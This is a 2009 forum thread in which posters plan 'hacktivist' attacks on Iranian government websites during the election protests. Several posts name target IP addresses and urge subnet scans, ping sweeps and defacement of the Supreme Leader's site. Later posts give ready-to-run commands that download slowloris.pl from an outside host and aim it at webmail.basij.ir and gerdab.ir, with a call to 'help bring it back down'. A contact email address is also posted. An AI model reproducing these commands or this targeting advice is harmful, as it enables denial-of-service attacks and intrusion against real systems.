Hacktivism

Discussion in 'Iran' started by Leptok, Jun 16, 2009.

  1. port 80 and 443 are the webserver. port 21 seems to be filtered. no obvious holes.

    that webserver can easily be taken down by using slowloris.pl though.
  2. lets get serious

    Why hack webservers? Come on people, let's scan their subnet range and find more exotic servers housing more exotic features of the government... I'm willing to bet they're on the same subnet...

    Someone with bandwidth pingsweep and find what host are alive and look for vuln services...

    Ahmadinejad.ir - 217.218.155.110
    leader.ir 62.220.121.130

    let's find core backbone routers... traceroutes, drop nameservers... if the government doesn't want communication for the people then they shouldn't get communication either...
  3. Here is what I got when I ran a whois query, with the ip-217.218.155.110
  4. Then after querying at that site I got this, not sure if it helps any.
  5. Twitter Account Hacked?

    This may sound paranoid but.........once I started sending Tweets that said things like, Basiji, you are cowards. You shoot unarmed and women. Lay down your arms. Murder or Freedom. Your choice.

    I sent Tweets like that for about 4 hours and I never once saw it come up at #iranelection. Before I started saying things like that, I would see my Tweets once in a while. Is it possible Iran gov't. disabled my Twitter account? Or did I just miss it?

    Thanks.
  6. Stop the ddos attacks

    You MAY want to pay attention to this post... I can fully see the logic in his/her post and would recommend the same!
  7. _----_

    dont forget Press TV
    a fu**ing piece of sh*t News agency
    n farsnews.com
    a main website for spreading bullshit
  8. It's good to know what bullshit they are spreading, because it gives you a clue at what they are worried about the most.
  9. To see your tweet you need to include the tag of course.
    Ex: "Die you scum sucking Basiji#iranelection"
  10. spritrig Member

    Change content of Supreme Leader's website.

    Can the content of the Supreme leader's website be modified to include photos of the dead, and videos of the dying next to the photos of the supreme leader.
  11. Redon ballet

    Maybe you should have paid attention instead. They're already saying that it's all the westerners fault. DDOS or not.
    No one gives a shit what they say. They want censorship - they get closed pools.
  12. I always put several tags, #iranelection #Tehran #Iran #Mousavi #gr88

    I was seeing my tweets every once in a while before I started posting about Basiji. I posted about them for about 4 hours and realized I was not seeing those Tweets. So I wondered if my account was hacked.



  13. Geraldanthro Member

    Chinese internet shut down by simple DDoS attack

    Well, a large portion of it anyway. A DDoS attack on one domain server created a cascade reaction that left five provinces struggling to get online:

    This is what happened during the DNSPod incident, however, it triggered a chain of unexpected events, which led to network congestions for the carrier networks. DNSPod's servers happen to be used by Baofeng, a highly popular Chinese video streaming service. Once the millions of Baofeng users fired up their desktop application, all the requests bounced off on the ISP servers, which did not know how to process them.

    The intense traffic on the high-level servers caused bottlenecks, slowing everyone's Internet connection down to a crawl. In addition to the users in the five aforementioned provinces, who were severely affected, customers in Henan, Anhui and Gansu have also reportedly experienced problems.

    SOURCE:
    http://www.thedarkvisitor.com/
    Site seems to be down???



    g
  14. This. Most of their shit is under constant attack. woop woop no stoppin us nao
  15. The protesters should try to take control of "Voice Of Justice", assuming the station is in Iran, I've heard it on 9495 AM in North America.
  16. ^^^THIS!

    They have a communications infrastructure which is vital to their operations. If anything were to be accomplished by hacking, it would be an attack against them.

    Trying to DDOS a pro-regime web site will accomplish nothing.
  17. bso.ir contact email: ermia.gh@gmail.com
  18. Geraldanthro Member

    Strange their contact email would be Gmail?
    When they run their own email server in Iran??

    G
  19. bwahahaha - funny

    google bso.ir.

    their site comes up as "HACKED BY KAMY4r." That may have happened a long time ago - dunno cause the site is inaccessible now.
  20. Lebanon-IRAN Member

  21. three simple commands...

    wget http://ha.ckers.org/slowloris/slowloris.pl

    chmod +x slowloris.pl

    ./slowloris.pl -dns webmail.basij.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
  22. posted too soon

    Scratch that, gerdab.ir is back up - that's the site where the Basij posted up photos of protesters in order to ID and arrest them. Please help bring it back down, we had it down most of the day, the command you should run is:

    ./slowloris.pl -dns gerdab.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
  23. FYI the offending page: ?????????? ?? ??????? ????
